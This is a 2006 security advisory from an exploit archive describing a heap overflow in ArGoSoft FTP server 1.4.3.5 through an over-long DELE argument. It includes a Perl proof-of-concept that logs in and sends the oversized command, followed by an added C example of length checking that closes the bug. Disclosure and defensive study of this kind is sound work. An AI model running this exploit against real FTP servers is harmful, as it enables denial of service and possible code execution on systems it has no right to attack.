argoOverflow.txt

2006-02-26T00:00:00
ID PACKETSTORM:44198
Type packetstorm
Reporter Jerome Athias
Modified 2006-02-26T00:00:00

Description

                                        
`-- Title:
ArGoSoft FTP server remote heap overflow  
  
-- Affected Products:  
ArGoSoft FTP server 1.4.3.5 (current) and prior  
  
-- Affected Vendor:  
ArGoSoft - http://www.argosoft.com  
  
-- Impact:  
DoS, Arbitrary Code Execution  
  
-- Where:  
From remote
  
-- Type:  
Heap Overflow  
  
-- Vulnerability Details:  
A remote attacker with valid credentials can trigger a heap
overwrite in ArGoSoft FTP server.
The bug is triggered by supplying a long argument to the DELE command.
This vulnerability can allow remote attackers to execute arbitrary code
or launch a denial of service attack.
  
-- Credit:  
This vulnerability was discovered by Jerome Athias.  
https://www.securinfos.info/english/  
  
  
  
  
#!/usr/bin/perl

# ---------------------------------------------------- #
# ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #
# Jerome Athias                                        #
# ---------------------------------------------------- #

use strict;
use warnings;
use Net::FTP;

# Read command-line arguments (order matches the usage message below)
my $host  = $ARGV[0];
my $port  = $ARGV[1];
my $user  = $ARGV[2];
my $pass  = $ARGV[3];
my $debug = $ARGV[4] || 0;

# ===========

if (($host) && ($port)) {

    # make exploit string
    my $exploit_string = "DELE ";
    $exploit_string .= "A" x 2041;
    $exploit_string .= "B" x 4;
    $exploit_string .= "C" x 1026;

    # On Win2K SP4 FR:
    # EAX 42424241
    # ECX 43434343
    # EDX 43434342
    # EBX 43434B73

    # ===================

    print "Trying to connect to $host:$port\n";
    # Net::FTP spells the option "Timeout"; "TimeOut" is silently ignored
    my $sock = Net::FTP->new($host, Port => $port, Timeout => 30,
        Debug => $debug) or die "[-] Connection failed\n";
    print "[+] Connect OK!\n";
    print "Logging...\n";
    # Fall back to test/test when no credentials are given
    if (!$user) {
        $user = "test";
        $pass = "test";
    }
    $sock->login($user, $pass);
    my $answer = $sock->message;
    print "Sending string...\n";
    # Send the raw command line over the control channel
    $sock->quot($exploit_string);
} else {
    print "ArgoSoft FTP Server - PoC Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n";
}
`
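
On the server side, the class of bug described in the advisory above is closed by checking the length of the command argument before it is copied into any fixed-size buffer. The following is an added example, not ArGoSoft's code and not part of the original advisory; the names `ftp_parse_line` and `struct ftp_cmd` and both buffer limits are assumptions chosen for illustration, and the input in `main` is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits for this sketch, not values taken from ArGoSoft. */
#define FTP_VERB_MAX 4
#define FTP_ARG_MAX  260                    /* MAX_PATH on Windows */

struct ftp_cmd {
    char verb[FTP_VERB_MAX + 1];
    char arg[FTP_ARG_MAX + 1];
};

/* Parse one control-channel line of known length into fixed buffers.
 * Returns 0 on success, else the FTP reply code to send (500 or 501). */
int ftp_parse_line(const char *line, size_t len, struct ftp_cmd *out)
{
    const char *sp;
    size_t vlen, alen, i;

    memset(out, 0, sizeof *out);
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                              /* strip trailing CR LF */
    if (memchr(line, '\0', len) != NULL)
        return 500;                         /* embedded NUL: malformed */
    sp = memchr(line, ' ', len);
    vlen = sp ? (size_t)(sp - line) : len;
    if (vlen == 0 || vlen > FTP_VERB_MAX)
        return 500;                         /* no verb or verb too long */
    alen = sp ? len - vlen - 1 : 0;
    if (alen > FTP_ARG_MAX)
        return 501;                         /* rejected before any copy */
    for (i = 0; i < vlen; i++)
        out->verb[i] = (char)toupper((unsigned char)line[i]);
    if (alen > 0)
        memcpy(out->arg, sp + 1, alen);     /* NUL terminator from memset */
    return 0;
}

int main(void)
{
    static char line[4096];                 /* constructed over-long DELE */
    struct ftp_cmd cmd;
    memset(line, 'A', sizeof line);
    memcpy(line, "DELE ", 5);
    printf("long DELE  -> %d\n", ftp_parse_line(line, sizeof line, &cmd));
    printf("DELE a.txt -> %d\n", ftp_parse_line("DELE a.txt\r\n", 12, &cmd));
    return 0;
}
```

The over-long line is refused with a 501 reply and nothing is written to `arg`; the same length check would sit in front of every command handler that takes a path, not only DELE.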